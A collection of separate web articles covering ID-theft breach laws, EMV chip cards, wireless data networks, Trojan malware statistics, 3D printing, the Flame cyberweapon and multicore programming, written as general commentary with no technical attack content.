Because reports to the FTC are incomplete, it's hard to draw conclusions from the data, said Gartner analyst Avivah Litan. But she noted that while breach laws have made lost laptops front-page news, many companies have responded to tighter laws and regulations by focusing more on compliance than on security.
Often, that's not good enough to protect customers from ID theft, she said. "If you just meet the letter of the law you may pass an audit, but you have to pass the spirit of the law."
Romanosky admits that there may be problems in the methodology used by his team. And while he noted that the data -- compiled from self-reported complaints -- may not be perfect, the FTC database is the only source of this type of information.
In fact, there may be good reasons that explain why breach laws have not cut down on identity theft. Many consumers simply ignore breach notification letters. And Romanosky believes that security firms are still not doing enough to protect data themselves. "In so many of these cases, the breaches occur because of ridiculous security practices," he said.
Romanosky knows something about information security in the corporate world. Before deciding to pursue his Ph.D, he worked in the security groups of companies such as Morgan Stanley and eBay.
The researchers suggest a few next steps to better understand identity theft. The federal government should adopt a unified breach law in order to "reduce conflict between states laws and lower the barrier for compliance," they write in their paper.
Also, there should be standardized notification requirements so that victims learn pertinent information about the breach. Finally, they said that some kind of oversight committee should be set up as the definitive source of breach data, so that there is better information for consumers, policy makers, and researchers.
Gartner's Litan offered one more observation that might explain Carnegie Mellon's findings: The fraudsters are also getting better at what they do, she added. "If you talk to the largest banks, they will tell you that fraud has really increased in the past 18 months," she said. "And they project it going up very significantly in the next two years."
"The thieves are just getting better and there's more fraud," she said. | <urn:uuid:fa242bb7-5eef-42a4-9c1c-f7f5b14080e3> | CC-MAIN-2017-09 | http://www.csoonline.com/article/2122802/identity-theft-prevention/researchers--notification-laws-not-lowering-id-theft.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00534-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.968134 | 885 | 2.546875 | 3 |
Chip-and-PIN refers to the use of chip-based bank cards and mandatory PIN entry for credit and debit card payments. The term was coined in the United Kingdom and is the name of the government-backed initiative to implement the EMV standard for secure payments in the UK. Though people commonly call it chip-and-PIN, the technical term is EMV. It’s a global technology specification for payment adopted by MasterCard, Visa, JCB and American Express. It ensures that chip cards work with point-of-sale terminals and ATMs from country to country, to authenticate credit and debit card transactions. The PIN adds another layer of security.
EMV payment cards are used in many areas of the world and contain chips, or tiny computers, that make transactions safer and prevent counterfeit fraud. More than 80 countries globally use EMV chip cards and they are accepted at more than 20 million terminals worldwide. In the United States, American Express, Discover, MasterCard and Visa have all announced roadmaps to move the payments industry to EMV chip cards. | <urn:uuid:7c8c15ae-dacf-44bc-afa5-708ddcec9875> | CC-MAIN-2017-09 | https://www.justaskgemalto.com/en/what-is-chip-and-pin/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00234-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.94738 | 218 | 3.375 | 3 |
Wireless technology has exploded in the last several years, and it provides an expanding array of technology choices. Wireless technology refers to the transmission and receipt of information (voice, fax, data) using radio frequency (RF) energy. It can be point-to-point, analogous to telephone or leased-circuit connections, or broadcast, such as commercial television and radio.
However, not all commercial wireless technologies are for government users, and a few are only now becoming viable in this regard. For both voice and data, wireless networks are merely an extension of wired networks from the user perspective. Within the context of government users and applications, what follows are several of the most pervasive and applicable wireless technologies available today and a brief glimpse at some promising technologies for tomorrow.
Specialized Mobile Radio (SMR)
The Federal Communications Commission (FCC) established specialized mobile radio (SMR) services in the mid-1970s by allocating a portion of the 800MHz frequency band for private land mobile-radio systems. SMR networks are operated by commercial system providers. Types of services provided include voice radio networks (including dispatch service), mobile packet data networks, and telephone and paging services. Initially developed around interstate highways and population centers, some of these networks have extended their service to include outlying areas. The main differentiators for SMR networks are transmission speed, transmission protocols, coverage areas and cost.
SMRs specializing in data communications typically use a packet-switching protocol. Data is segmented and routed in discrete data envelopes called "packets," each with its own control information for routing, sequencing and error checking. Packet switching allows a communications channel to be shared by multiple users, each using the circuit only for the time required to transmit a single packet. Users are able to maintain a continuous connection to the network without permanently tying up a channel.
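The packet-switching idea described above — segmenting a message into discrete, self-describing packets and reassembling them at the receiver — can be sketched as follows. The packet fields and the 4-byte segment size are purely illustrative; they do not correspond to any real SMR protocol.

```python
def packetize(payload: bytes, mtu: int = 4):
    """Segment a message into packets, each carrying its own control
    information for sequencing, routing and reassembly."""
    chunks = [payload[i:i + mtu] for i in range(0, len(payload), mtu)]
    return [{"seq": n, "total": len(chunks), "data": chunk}
            for n, chunk in enumerate(chunks)]

def reassemble(packets) -> bytes:
    # Packets share the channel with other users' traffic and may
    # arrive out of order; the sequence numbers restore the message.
    ordered = sorted(packets, key=lambda p: p["seq"])
    return b"".join(p["data"] for p in ordered)
```

Because each packet occupies the channel only for its own transmission time, many users can share one channel without any of them holding it continuously.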
Some advantages and disadvantages of SMR systems are summarized below:

Advantages:

* Cellular-style roaming throughout the coverage area
* Easy access to the public switched telephone network
* Supports short, frequent messages well (e.g., data inquiries, text messages)
* Services designed specifically for data

Disadvantages:

* Coverage lacking in less-populated areas
* Priority access to regular telephone networks not available for government users
* Potentially significant ongoing costs for usage fees
* Does not support sustained data transfers well (e.g., long reports, images)
Today, over 80 percent of the customers who subscribe to SMR services are in the construction, service or transportation industries. However, over the last 10 years, SMR network providers have increased their marketing efforts to public agencies.
Spread Spectrum

Spread spectrum is a modulation technique that takes an input signal, mixes it with frequency-modulated (FM) noise and "spreads" the signal over a broad frequency range. The signal then hops from frequency to frequency at defined intervals, resulting in the spread signal having greater bandwidth than the original message. Spread-spectrum receivers have unique user codes to recognize, acquire and "de-spread" a spread signal, thus returning the signal to the original message.
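The essential trick, both ends deriving the same pseudo-random hop pattern from a shared user code, can be illustrated with Python's standard random module. The 79-channel count and the 12-hop length are arbitrary choices for the example, not parameters of any real system.

```python
import random

def hopping_sequence(user_code: int, n_hops: int, n_channels: int = 79):
    """Derive a deterministic pseudo-random channel sequence from a shared
    user code; transmitter and receiver compute the identical pattern."""
    rng = random.Random(user_code)  # the shared code acts as the seed
    return [rng.randrange(n_channels) for _ in range(n_hops)]

transmitter = hopping_sequence(user_code=0x5EED, n_hops=12)
receiver = hopping_sequence(user_code=0x5EED, n_hops=12)
# A receiver without the right code derives a different pattern and
# never "de-spreads" the signal, which is the basis of the security claim.
```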
Popularly available spread-spectrum data networks use a mesh topology of shoebox-size radio transceivers (microcell radios), which are mounted to streetlights or utility poles. These microcells are strategically placed every quarter- to half-mile in a checkerboard pattern. Each microcell radio employs multiple-frequency-hopping channels and uses a randomly selected hopping sequence. Frequency hopping allows for a very secure network. These types of networks use digital-packet-switched protocols similar to that employed by SMRs.
Microcells transmit messages to wired access points (WAPs). WAPs convert the data packets into a format for transmission to a wired Internet protocol network backbone. Each WAP and the microcells that report to it can support thousands of subscribers.
The major spread-spectrum data provider is Metricom. Its system transmits data at a raw speed of 100 kilobits per second (Kbps), with throughput averaging 28.8Kbps. Planned system upgrades will increase throughput up to 40Kbps using existing radio modems. Metricom also plans to offer service with throughput up to 128Kbps. This service will use spectrum in the 2.3GHz range and will require a radio modem upgrade.
Some advantages and disadvantages of spread-spectrum systems are summarized below:
Spread Spectrum Systems

Advantages:
* High bandwidth
* Secure communications
* Low initial cost
* Easy for provider to expand coverage

Disadvantages:
* Limited availability for wide-area use
* Must be quasi-stationary to use
* Recurring monthly costs
Cellular

By most estimates, more than 90 percent of traffic on the U.S. cellular telephone network is voice, but data transmissions are increasing rapidly. In 1995, there were approximately 1 million wireless-data users, with the market projected to grow to nearly 10 million users by the year 2000.
While its popularity and coverage have expanded since Advanced Mobile Phone Service (AMPS) was introduced in the early 1980s, analog cellular radio is still the base technology used for cellular service today. There are currently two methods for sending data over cellular networks: cellular digital packet data (CDPD) and cellular switched-circuit data (CSCD). Each has distinct advantages depending on the type of application, amount of data to send or receive, and geographic coverage needs.
CDPD is currently available to roughly 50 percent of the population base. Two methods to transmit data are used, depending upon the service provider's network architecture. Some providers have radio channels dedicated to data transmission installed at existing voice cellular sites. Others use voice cellular channels and interleave data messages within the unused portion of voice radio signals. To use a CDPD data service, users require a laptop computer, a connector cable and a CDPD radio modem. Radio modems come in a PC-card format or connect to the user device with a serial cable.
Regardless of the method used, messages are broken up into discrete packets of data and transmitted continuously over the network. Messages are then "reassembled" into the original message at the receiving device. This technology supports roaming and is especially attractive for multicast (e.g., one-to-many) service, allowing updates to be periodically broadcast to all users. Users log on once per day to register on the network. Messages and transmissions automatically locate them.
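The reassembly step at the receiving device reduces to sorting by sequence number and checking for gaps. This toy sketch assumes each packet is a dictionary with a "seq" and a "payload" field; those names are invented for illustration.

```python
def reassemble(packets):
    """Rebuild the original message from packets that may arrive out of
    order, using each packet's sequence number."""
    ordered = sorted(packets, key=lambda p: p["seq"])
    # Refuse to splice the message together if any packet is missing.
    if [p["seq"] for p in ordered] != list(range(len(ordered))):
        raise ValueError("missing packet; retransmission needed")
    return b"".join(p["payload"] for p in ordered)
```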
CDPD supports TCP/IP and is most appropriate for short bursts of data, such as e-mail, credit-card authorization or database queries. Currently, CDPD provides data rates of 19.2Kbps with throughput averaging 14.4Kbps. Next-generation systems will allow higher data rates.
Nationwide, approximately 45 percent of CDPD agencies are in public safety. Many of these users are using the service as an adjunct to their existing private mobile-data systems. Typical applications include database inquiry, automated field reporting and unit-to-unit messaging. Although there are only limited examples of use in public safety, CDPD does provide the capability for electronic dispatch of units.
Major CDPD providers generally have roaming agreements to allow users to access the service when outside their home coverage area.
Some advantages and disadvantages of CDPD systems are summarized below:
Cellular Digital Packet Data (CDPD)

Advantages:
* Supports short, frequent messages well
* Inexpensive end-user equipment
* Available today
* Protocol provides easy access to the Internet
* Transparent roaming available
* Moderate data rates (19.2Kbps)
* Secure (data encryption provided by carrier)
* Service in major population areas
* System designed for data

Disadvantages:
* Not yet fully deployed
* Coverage not available in less-populated areas
* Priority access not available for government users
* Potentially significant ongoing costs
* Newer technology
* Does not support sustained data transfers well
Cellular switched-circuit data is today's most popular and widely available option for wireless data transfer. It creates a dedicated connection, or circuit, over the analog cellular network for the duration of the call, in contrast to a packet-switched network, in which many users share the channel. Transfer rates are up to 14.4Kbps. Transferring data with CSCD requires a laptop computer, a data-capable cellular telephone, a connector cable and a cellular modem (typically a PC card).
As with voice service, charges are determined by the duration of calls, making CSCD cost-effective for larger data transmissions with file transfer, fax and e-mail applications. Cellular switched-circuit data is a good approach for session-based interactive transactions, such as logging onto a host
application or accessing a private intranet. CSCD networks are low security but can be improved through user-provided encryption applications. CSCD is compatible with most off-the-shelf modem software. Since this service is available wherever analog cellular service is available, there is a variety of service providers.
Some advantages and disadvantages of CSCD systems are summarized below:
Cellular Switched-Circuit Data (CSCD)

Advantages:
* Inexpensive and easy-to-use user devices
* Transparent roaming
* Service in major population areas (covers 90 percent to 95 percent of population base)
* Supports sustained data transfers well
* Voice and data capabilities
* Extensive applications software
* Good developer support

Disadvantages:
* Dial-up connection required for each data message
* Does not support short, frequent messages well
* Priority access not available to government users
* Potentially significant ongoing costs
* Reliability (transmissions can drop when moving between cells)
* Roaming can be expensive
* Security (data encryption is an add-on)
Personal Communications Systems
Personal communications systems (PCS) are the next generation of terrestrial-based commercial wireless communications, providing inexpensive voice and data services. PCS include a broad range of telecommunications services intended to provide subscribers with enhanced features and wireless access to the public switched network. "One person, one number" has become the familiar motto of PCS in recent years.
The Personal Communications Industry Association predicts that there will be more than 167 million subscribers to PCS services by 2003. To accommodate this expected demand, the FCC has allocated both narrowband (901-902MHz, 930-931MHz, 940-941MHz) and broadband (1850-1990MHz) frequency spectra for PCS services. Blocks of spectra were auctioned by the FCC between 1995 and 1997.
PCS design is similar to cellular design, but PCS use all-digital technology. PCS systems use a large number of low-power transmission sites to support high levels of data throughput.
Examples of enhanced services available from PCS providers include voice mail; call hold, forwarding, waiting, and three-way calling; paging; text messaging; distinctive ringing; fraud control (through authentication and encryption); and better reception than analog cellular within the coverage area. Current data communication capability is provided via a dial-up connection, similar to switched-circuit cellular.
The jury is still out regarding the effectiveness of PCS for wide-area use. While existing PCS services rely on cellular-type architectures, combinations of PCS services with satellite and other technologies may provide a greater functionality in the future. However, since providers of PCS services have designed their systems using competing technologies, wide-area roaming may be difficult.
Some advantages and disadvantages of PCS are summarized below:
Personal Communications Systems (PCS)

Advantages:
* Telephone interconnect/easy access to the Public Switched Telephone Network (PSTN), or "regular" telephony
* Support for high-volume data applications
* Increased competition, lower prices
* Difficult to eavesdrop
* Advanced digital features
* Low-weight, multipurpose, low-cost devices
* System design allows for reduced power consumption, longer battery life

Disadvantages:
* Low power requires numerous sites for coverage (limited initial coverage)
* Priority access not available for government users
* Competing technologies inhibit roaming
* Potentially high recurring costs
Satellite Systems

Satellites function as radio repeaters in the sky. Radio signals are beamed to the satellite from an earth station via an uplink. At the satellite, the signal is filtered, converted and retransmitted via a downlink to ground-station or mobile receivers. Satellites can receive and retransmit thousands of signals simultaneously, from simple digital data to the most complex television programming. Satellite systems provide effective and ubiquitous mobile communications for users requiring a large coverage area (e.g., transportation, military, exploration, and maintenance). Recently, satellite companies have begun to show a higher level of interest in the public-sector market.
Two main types of satellite systems offer communications services applicable to government users: geosynchronous earth orbit (GEO) and low earth orbit (LEO) satellites. Satellite system providers use both circuit-switched and packet-switched technologies.
GEOs orbit the earth at an altitude of approximately 22,300 miles, traveling at the same angular speed as the earth rotates on its own axis. Thus, GEOs appear to remain "stationary" relative to a reference point on the earth. A single GEO can "see" approximately 40 percent of the Earth's surface. Three such satellites, spaced at equal intervals, can provide global coverage.
Due to a GEO satellite's distance from Earth, reception of the repeated signal can be delayed as much as 120 to 250 milliseconds for each outbound and inbound transmission. Data throughput rates range from 4.8Kbps to 9.6Kbps. In addition, these large distances cause GEO transmissions to require more power than closer terrestrial or LEO communications. This requirement has made it difficult to produce convenient hand-held radios that are able to access GEO satellites. GEO service vendors have historically focused on video, data broadcasting and long-haul transportation industries.
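The propagation delay follows directly from the speed of light and is easy to check. The sketch below computes only the straight-line trip for a satellite directly overhead; slant paths, onboard processing and ground-segment hops all add more.

```python
SPEED_OF_LIGHT_KM_S = 299_792.458
KM_PER_MILE = 1.609344
GEO_ALTITUDE_KM = 22_300 * KM_PER_MILE   # roughly 35,900 km

def propagation_delay_ms(distance_km: float) -> float:
    """One-way propagation delay over distance_km at the speed of light."""
    return distance_km / SPEED_OF_LIGHT_KM_S * 1000.0

uplink_ms = propagation_delay_ms(GEO_ALTITUDE_KM)  # ground to satellite, ~120 ms
bent_pipe_ms = 2 * uplink_ms                       # up and back down, ~240 ms
```

By the same arithmetic, a LEO a few hundred miles up adds only a few milliseconds each way, which is why low delay shows up as a LEO advantage.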
LEO satellites do not remain stationary above the Earth. They orbit 300 to 900 miles above the Earth's surface at speeds of 16,500 miles per hour. A LEO system is made up of satellites all traveling at the same speed and the same altitude. Satellites are positioned relative to each other such that each covers a portion of the Earth's surface. As the satellites travel around the world, their coverage areas move with them. As one satellite starts to leave a certain geographic area, it "hands off" communications to the next satellite entering the area, maintaining continuous coverage. A network control system interconnects the LEO satellites and links individual satellites. Since LEOs are closer to the Earth's surface, less power is required to send a message to them. User devices can be smaller and less sophisticated than those designed for use with GEO systems.
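The hand-off behavior can be mimicked with a deliberately simplified one-dimensional model: satellites advance along a track, and the serving satellite is whichever one's coverage window currently contains the user. Real constellations involve orbital geometry, so treat the positions and radii here purely as illustration.

```python
def serving_satellite(user_pos, sat_positions, coverage_radius):
    """Return the id of a satellite whose footprint covers the user."""
    for sat_id, pos in sat_positions.items():
        if abs(pos - user_pos) <= coverage_radius:
            return sat_id
    return None  # coverage gap

# Two satellites 100 units apart, each covering +/- 60 units, both moving.
sats = {"A": 0, "B": -100}
serving = []
for step in range(3):
    serving.append(serving_satellite(30, sats, coverage_radius=60))
    sats = {k: v + 70 for k, v in sats.items()}  # constellation advances
# serving -> ["A", "A", "B"]: as A drifts out of range, B takes over.
```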
Significant efforts are currently under way to develop new LEO systems, with the earliest service anticipated for later this year. LEO vendors include:
* Globalstar -- A joint effort between Loral and Qualcomm, offering narrowband, dual-mode telephones with paging, low-speed data and position-location services.
* ECCO -- Designed by Constellation Communications, ECCO will offer narrowband, dual-mode telephones with paging, low-speed data and fax services.
* Iridium -- This LEO service provider is from Motorola. Iridium will offer narrowband, dual-mode telephones with paging, low-speed data and fax services.
* Teledesic -- Co-founded by Microsoft's Bill Gates and Craig McCaw of McCaw Communications. It will offer broadband multimedia, videoconferencing and Internet services.
The tables below summarize some of the advantages and disadvantages of geosynchronous and low earth orbit satellites:
Geosynchronous Earth Orbit (GEO) Satellites

Advantages:
* Access to PSTN
* Many advanced digital features
* Accessibility from remote areas
* Ability to support voice and data

Disadvantages:
* Reduced coverage in "urban canyons"/line-of-sight
* Limited range of user equipment
* Low data-transmission rates
* High user-equipment costs
* High recurring costs
* Significant propagation delay
* Single point of failure
* Unproven for public safety and local government use
Low Earth Orbit (LEO) Satellites

Advantages:
* Advanced digital features
* Little propagation delay
* Access to PSTN
* Ability to support voice and data

Disadvantages:
* Entire system must be in place before operable
* Requires enormous infrastructure
* Limited range of user equipment
* Unproven; features and capabilities unclear
* Potentially high recurring and equipment costs
Evaluating wireless technology can be complicated and time-consuming. However, focusing on users' functional needs can enable more effective comparison of alternatives. Some specific areas to consider for wireless technology include:
* Application Integration -- Does the technology allow a smooth interface with current and planned applications? Would it facilitate software modifications if changes in system protocol or operational requirements occur?
* Performance -- Software and hardware components of the network must be responsive to user needs. Sensitivity to loading requirements, peak user demand and the ability to transfer information in the time frame required are critical parameters.
* Availability/Reliability -- On an annual basis, what is the percentage of time that the network is available for processing user requests? How does the availability change during emergencies or other periods of peak usage?
* Security -- Careful consideration must be given to the ability of system managers to control access to and use of the network on a user-by-user basis.
* User Interface/Device -- The types of devices available for use on the network and their functionality -- including features, indications, ergonomic capabilities, vendor sources, etc. -- should be compared to end-user requirements.
* Coverage -- The percentage of the service area over which the network can be used, usually defined by geographic areas with associated reliabilities for accessing the system. How does the coverage area compare to user-defined operating areas?
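Several of these criteria can be quantified before any procurement. Availability, for example, converts directly into hours of outage per year; the helpers below are a generic back-of-the-envelope sketch rather than any vendor's published metric.

```python
HOURS_PER_YEAR = 365 * 24   # 8,760 hours

def availability_percent(downtime_hours: float) -> float:
    """Percentage of the year the network can process user requests."""
    return 100.0 * (1.0 - downtime_hours / HOURS_PER_YEAR)

def annual_downtime_hours(availability_pct: float) -> float:
    """Annual outage implied by a quoted availability percentage."""
    return HOURS_PER_YEAR * (1.0 - availability_pct / 100.0)
```

A quoted "99 percent available" still permits roughly 88 hours of outage a year; the harder question raised above is whether those hours coincide with emergencies or other periods of peak usage.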
Gregory Walker is a senior consultant with The Warner Group, a Woodland Hills, Calif.-based management consulting firm specializing in the public sector. He has significant experience evaluating wireless voice and data systems and can be reached at (818) 710-8855.
Trojan horses gain inside track as top form of malware
Panda Security released its latest report on computer malware, showing unexpected trends government security managers should know about, including the resurgence of a traditional form of malware.
First, the number of new infections is staggering, though system administrators probably expect that these days. In the first three months of the year, there were over six and a half million new malware samples created. Many of those are probably minute variations of each other, but that’s still an astounding number.
But what is more interesting is that over 80 percent of the infections are Trojan horses. Trojans can’t replicate on their own. Unlike worms or most viruses, they are incapable of copying their code to other computers once they find a home. So how did they capture the number one spot in infections? Simple. The people who program them set them up on compromised websites. Users download them, thinking they are something else, like a Java plug-in or a browser helper. They can even be targeted to specific users, such as those running a certain operating system with a known vulnerability, making them highly effective.
In fact, Panda calls them the most dangerous type of infection, because their job is to steal personal information, bank account information, government secrets or other data that leads to further crimes being committed. “Trojans are cyber-crooks’ weapon of choice, which explains why they account for most new specimens in circulation and infections triggered in the first quarter of the year,” wrote Luis Corrons, technical director of Panda Labs, as part of the new report.
Another interesting fact in the report is the number of infected computers by country. While the global average for infected computers is 31.13 percent, the United States remains below that number by just a bit with 27.79 percent of its computers infected. And while we often think of China as being an instigator of cyber crimes (a recent report from Prolexic showed it was the largest base of operations for DDOS attacks so far in 2013), the Chinese apparently have their own problems too.
According to the Panda report, over 50 percent of all the computers in China are infected with malware of some type, making it the only nation in the world with more than half of its systems compromised.
Obviously the new report is an eye-opener in a lot of ways. Computer crimes committed through Trojans aren’t just designed to ruin work or to embarrass users by sending porn to all their contacts. They are launch pads for other crimes in which criminals steal real money, passwords or even government secrets. The need to remain vigilant, keep virus and malware protection constantly updated and simply be careful about what you download is more important than ever. It’s a dangerous world out there, and the latest Panda report shows just how dark things have become.
Posted by John Breeden II on May 06, 2013 at 9:39 AM | <urn:uuid:f92b86af-be99-4592-a4f5-1343756c2fc0> | CC-MAIN-2017-09 | https://gcn.com/blogs/emerging-tech/2013/05/trojan-horses-top-malware.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00530-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964768 | 601 | 2.53125 | 3 |
3D Printing and the Future of Manufacturing
Who would have thought that modern manufacturing could be done without a factory? Since the Industrial Revolution, manufacturing has been synonymous with factories, machine tools, production lines and economies of scale. So it is startling to think about manufacturing without tooling, assembly lines or supply chains. However, that is what is emerging as the future of 3D printing services takes hold.
3D printing is making its mark as it reshapes product development and manufacturing and turns individuals, small businesses and corporate departments into “makers.” CSC’s new report, 3D Printing and the Future of Manufacturing, explores the opportunities of 3D printing services and provides 10 questions companies should be asking as they prepare to join this trend.
The idea of a do-it-yourself manufacturer is really coming to the forefront. Similar to the way the Internet leveled the playing field, solving the challenges of reach and enabling everyone to play, that’s what is happening with manufacturing today.
You don’t need all of the capital involved in the creation of things anymore. You now have the opportunity at a small scale, even as a hobbyist, to do it yourself, and to do it fairly elegantly.
With 3D printing being applied to materials ranging from chocolate to cells to concrete, and being used by corporations, departments and consumers, organizations need to understand how the future of 3D printing manufacturing technology can be used for competitive advantage – before their competitors do.
3D Printing and Manufacturing for All
3D printing has been around for decades, better known as additive manufacturing (building an object layer by layer). What’s new is that 3D printing has reached consumer-friendly price points and footprints, new materials and techniques are making new things possible, and the Internet is tying it all together.
Technology has developed to the point where we are rethinking industry. The next industrial revolution is opening up manufacturing to the whole world – where everyone can participate in the process. This democratization idea will not be much different than the journey computers had – from a few, big, centralized mainframes to something we now hold in our hands.
Desktop 3D printing manufacturing technology can be done at home, the office, a hospital or a school, bringing manufacturing to non-manufacturers the way PCs brought computing to non-traditional environments.
At the same time, 3D printing, long used for rapid prototyping, is being applied in a number of industries today, including aerospace and defense, automotive and healthcare. As accuracy has improved and the size of printed objects has increased, 3D printing services are being used to create such things as topographical models, lighter airplane parts, aerodynamic car bodies and custom prosthetic devices. In the future, it may be possible for the military to print replacement parts right on the battlefield instead of having to rely on limited spares and supply chains.
However, it’s not just about replacing the technique of how we make and get a product – it’s about creating brand new products, with entirely new properties, that were not possible with the old techniques.
Further, any time there are new products and new properties, that changes the way business operates. If you apply every stage in the supply chain to this new world of 3D printing, the processes are going to change across the board.
Learn more about the origin of 3D printing and its impact on manufacturing by downloading the full 3D Printing and the Future of Manufacturing (PDF) report. | <urn:uuid:c0555ee4-0776-45a5-b5b0-c7e05f4a0ff3> | CC-MAIN-2017-09 | http://www.csc.com/innovation/insights/92142-the_future_of_3d_printing_services_and_manufacturing?ref=rec&dyn=0 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00578-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.954632 | 724 | 2.890625 | 3 |
What Does Flame Mean?
Once a system is infected, Flame begins a complex set of operations, including sniffing the network traffic, taking screenshots, recording audio conversations, intercepting the keyboard, and so on. All this data is available to the operators through the link to Flame’s command-and-control servers.
Lots of people are asking “What does Flame do?” The more important question, however, as the era of cyber war continues to evolve, is “What does Flame mean?” Flame, in fact, shows just how far and fast we’ve come along in cyber war. In the “old days” we saw the simple use of DDoS when Russia attacked Estonia in April of 2007. Just five years later, Flame shows the world that cyber war has evolved into something stealthier, more effective and a serious part of a military strategy. To borrow Andy Grove’s phrase, we’ve hit an inflection point. Consider:
- Cyber attack is now preferable to a military attack. The consequences of NOT using cyber warfare now outweigh cyber pacifism. It’s a bloodless form of war which can still inflict great damage. (What amazing irony that the same day Flame is revealed, the New York Times highlights the US approach to terrorism that involves a targeted “kill list.”) In fact, in the case of Iran, it seems cyber attack may have proven more effective than economic sanctions that seem to have done little to stop the development of nuclear weapons. For the attacker, anonymity is a major benefit as the victim can only speculate but can’t point a finger. Graphic images of source code just aren’t the same as pictures of dead or injured civilians when it comes to altering public opinions. If there were a physical attack on Iran, Iranian public opinion would very likely be mobilized behind a normally unpopular government.
- Cyber attack is a new form of deterrence. During the Cold War, if the US had 1,000 warheads the Soviets would try to get 1,001 which would lead to a Strategic Defense Initiative, a.k.a., Star Wars. Cyber attack gives deterrence a totally new spin: for the first time, a nation can prevent someone from garnering weapons. And this approach, conveniently, appears morally superior and so far has proven much less costly.
- Cyber attack will force adversaries to minimize their electronic productivity. It took nearly a decade to find Osama Bin Laden since he went completely off grid. No internet or phone, just couriers. Consequently, he became more of a titular versus operational leader. Does this mean that scientists developing weapons will resort to crayons and paper only? Probably not, but today life very likely got a lot harder for scientists working on military projects worldwide.
Cray J. Henry | The multicore challenge
Another View | Guest commentary: The makers of multicore processors in PCs could learn a few things from high-performance computing
- By Cray Henry
- Sep 20, 2007
Before the beginning of this decade you could have spent millions of dollars in new computer hardware each year and never had to consider buying a multicore computer ' unless you were in the market for a high-end supercomputer. Today dual-core machines are common on many desktops, quad-core machines are moving to market now, and the Sony PS3 gaming console has nearly double that number of computational elements supporting the main processor.
During the next several years we'll see processors with ever-larger core counts on the market. Arguably they will be much more powerful. But it raises new questions beyond how best to harness all that computational power. In particular, how can software developers create applications that can use all the cores efficiently to solve your problem faster?
This transition is already in motion and, without a disruptive new processing technology, inevitable. The reason for the move is straightforward ' people buying computers today want machines that are better than what they bought yesterday. But as technology advanced the chipmakers had to change how they define 'better.'
In the final decades of the 20th century the standard metric was the clock speed of a processor. Processors moved inexorably from 10 MHz up through 1 GHz. But as processor clock cycles moved into the GHz range, chip manufacturers encountered two main problems. First, the processors became so much faster than the rest of the computer that the processors had to (and still have to) wait for the information they need to continue working from slower memory systems. Radical changes in processor architecture were able to hide some of this delay, but carried higher design costs and added complexity for the software designers.
The second major problem chip designers encountered in moving past the 1 GHz mark is that faster clock speeds cause disproportionately higher power consumption and heat generation, causing problems for consumers and data centers hosting these machines.

The return of the FLOPS
Faced with a departure from the standard technology improvement cycle, manufacturers started to blend the ideas of capability and speed, resurrecting an older capability measure called FLOPS (Floating Point Operations Per Second). The advantage of FLOPS is that it can describe 'improving' computer performance while clock speeds stagnate or even decline. As manufacturers are able to create smaller and smaller features, space is made available on processor chips that can be used to host additional cores that can do more floating-point operations in a single clock cycle, and today's computers can once again be marketed as 'better' than yesterday's.
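Part of the metric's marketing appeal is that its arithmetic keeps improving even when clock speed stalls: peak FLOPS is just cores times clock times floating-point operations per cycle. The numbers below are illustrative, not any particular processor's specification.

```python
def peak_gflops(cores: int, clock_ghz: float, flops_per_cycle: int) -> float:
    """Theoretical peak GFLOPS = cores x clock (GHz) x float ops per cycle."""
    return cores * clock_ghz * flops_per_cycle

single_core = peak_gflops(cores=1, clock_ghz=2.4, flops_per_cycle=4)
quad_core = peak_gflops(cores=4, clock_ghz=2.4, flops_per_cycle=4)
# The peak quadruples with core count at a flat clock, but applications
# see that speedup only if software keeps every core busy.
```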
The problem, of course, is the software. How can software developers create applications that can use all of the cores efficiently on behalf of the user?
When the clock speeds were going up, the same old programs ran faster, usually with no effort on the part of the software developer. But as cores are added to processors at the same clock speed, software has to be adjusted to take advantage of the new capability. The challenge of writing parallel software has been the key issue for the computational science and supercomputing community for the last 20 years. There is no easy answer; creating parallel software applications is difficult and time consuming.

The convergence of supercomputing and commodity computing
In the supercomputing community we have many applications that can effectively use dozens to thousands of cores, but these applications represent only a tiny fraction of the applications in use around the world today. The real value of multicore machines will not be realized until mainstream software development techniques and practices evolve to encompass the art of parallel programming. The emergence of multicore computers brings this challenge to the forefront.
This is an area in which high-performance supercomputing has an advantage of several decades over the mainstream computing community.
The main challenge in parallelization is dividing a task over all the cores such that they are all working collectively at the same time on your problem. Most applications in use today follow very sequential logical approaches designed to run on one core; multicore developers have to be trained to think of parallel approaches. They are now faced with issues such as how to keep data synchronized as results are computed, shared and used as input to follow-on calculations across tens to thousands of cores. With each core potentially running independently, this is a hard problem especially if you don't want to waste compute cycles on individual cores waiting for the slowest calculation to catch up.
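The data-decomposition half of that challenge can be made concrete with a toy reduction. The sketch below only partitions the work and combines partial results sequentially; in a real parallel code each chunk would run on its own core, and the combined answer would be ready only when the slowest chunk finished.

```python
def partition(data, n_workers):
    """Divide the data as evenly as possible across n_workers cores."""
    chunk = (len(data) + n_workers - 1) // n_workers  # ceiling division
    return [data[i:i + chunk] for i in range(0, len(data), chunk)]

def chunked_sum(data, n_workers=4):
    """Each worker reduces its own chunk; one final step combines them."""
    partial_sums = [sum(chunk) for chunk in partition(data, n_workers)]
    return sum(partial_sums)
```

Even this trivial example hides the hard parts the article describes: keeping shared results synchronized, balancing chunk sizes so no core idles, and verifying the parallel answer matches the sequential one.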
In HPC, there are two main trends supporting the development of parallel software: the use of special language extensions that support explicit control of communications among individual compute cores (e.g., the Message Passing Interface (MPI) and OpenMP) and specialized parallel languages (e.g., Coarray Fortran and Unified Parallel C) that support both explicit communications and parallel logic constructs.
MPI has become the dominant approach in high-performance technical computing (HPTC) primarily because it is portable across multiple platforms and has a long legacy of support by the vendors. Developers of scientific applications in HPC can expect that successful products will be in use for 20 to 40 years, so they value portability.
